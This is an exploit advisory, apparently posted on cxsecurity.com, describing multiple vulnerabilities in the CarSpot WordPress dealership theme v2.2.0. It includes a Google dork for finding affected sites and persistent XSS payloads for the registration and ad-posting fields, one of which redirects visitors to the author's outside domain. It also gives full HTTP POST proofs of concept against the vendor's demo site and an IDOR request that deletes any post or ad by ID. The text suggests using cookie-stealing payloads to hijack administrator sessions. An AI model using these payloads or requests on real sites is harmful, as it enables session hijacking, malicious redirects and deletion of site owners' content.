CarSpot – Dealership Wordpress Classified Theme v2.2.0 Multiple Vulnerabilities

2020.01.17
ru m0ze (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: CarSpot – Dealership Wordpress Classified Theme v2.2.0 Multiple Vulnerabilities # Google Dork: /wp-content/themes/carspot/ # Date: 14/01/2020 # Exploit Author: m0ze # Vendor Homepage: https://scriptsbundle.com/ # Software Link: https://themeforest.net/item/carspot-automotive-car-dealer-wordpress-classified-theme/20195539 # Version: 2.2.0 # Tested on: Kali Linux # CVE: - # CWE: 79, 639 ----[]- Info: -[]---- Demo website: https://carspot.scriptsbundle.com/ Demo Profile #0: https://carspot.scriptsbundle.com/dealer/m0ze-1054757240/ Demo Profile #1: https://carspot.scriptsbundle.com/dealer/greetzfromm0ze/ Demo Profile #2: https://carspot.scriptsbundle.com/dealer/jibom21023/ ----[]- Persistent XSS -> Registration Form/User Profile: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input field: «Mobile Number». Payload Sample: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//"> PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: carspot.scriptsbundle.com User-Agent: Mozilla/5.0 ... Referer: https://carspot.scriptsbundle.com/register/ Cookie: _your_cookies_here_ action=sb_register_user&sb_data=sb_reg_name%3Dm0ze%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%252F%252F%2522%253E%26sb_reg_contact%3D%2522%253E%253C!--%253Cimg%2Bsrc%253D%2522--%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253D(alert)(%2560m0ze%2560)%253Bwindow.location%253D%2560https%253A%252F%252Fm0ze.ru%2560%253B%252F%252F%2522%253E%26sb_reg_email%3Dm0ze%2540was.here%26sb_reg_password%3Dasdasd%26sb_user_type%3Ddealer%26minimal-checkbox-1%3Don%26is_captcha%3Dno ----[]- Persistent XSS -> Ad Post -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input fields: «Mobile Number», «Address», «Latitude» and «Longitude». Payload Sample #0: "><!--<img src="--><img src=x onerror=(alert)(`m0ze`);window.location=`https://m0ze.ru`;//"> Payload Sample #1: <!--<img src="--><img src=x onerror=(alert)(`m0ze`)//"> PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: carspot.scriptsbundle.com User-Agent: Mozilla/5.0 ... Referer: https://carspot.scriptsbundle.com/sell-your-car/ Cookie: _your_cookies_here_ action=sb_ad_posting&sb_data=ad_title=PoC&is_update=&is_level=&country_level=&ad_cat=62&ad_cat_id=227&ad_cat_sub=227&ad_cat_sub_sub=228&ad_price=1337&ad_price_type=Fixed&ad_avg_hwy=1337&ad_avg_city=1337&ad_mileage=1337&_carspot_ad_condition=166%7CNew&_carspot_ad_type=76%7CBuy&_carspot_ad_warranty=248%7CYes&_carspot_ad_years=36%7C2013&_carspot_ad_body_types=118%7CHatchback&_carspot_ad_transmissions=67%7CAutomatic&_carspot_ad_engine_capacities=44%7C3500&_carspot_ad_engine_types=126%7CHybrid&_carspot_ad_assembles=131%7CImported&_carspot_ad_colors=69%7CBlack&_carspot_ad_insurance=247%7CYes&ad_features%5B%5D=Cool+Box&ad_yvideo=&tags=&ad_description=PoC&sb_total_extra=0&ad_country=230&ad_country_id=293&ad_country_states=293&sb_user_name=m0ze&sb_contact_number=%22%3E%3C!--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D(alert)(%60m0ze%60)%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%22%3E&sb_user_address=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Address%60)%2F%2F%22%3E&ad_map_lat=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Latitude%60)%2F%2F%22%3E&ad_map_long=%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D(alert)(%60Longitude%60)%2F%2F%22%3E&sb_make_it_feature=on&is_update= ----[]- IDOR: -[]---- Delete any post/page/ad: PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: carspot.scriptsbundle.com User-Agent: Mozilla/5.0 ... Referer: https://carspot.scriptsbundle.com/search-cars/?carspot_layout_type=4 Cookie: _your_cookies_here_ action=sb_remove_ad&ad_id=XXXX Where: ad_id=XXXX - page/post/ad unique WordPress ID, can be discovered as a page class for <body> tag. Response: HTTP/1.1 200 OK ... 1|Ad removed successfully.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top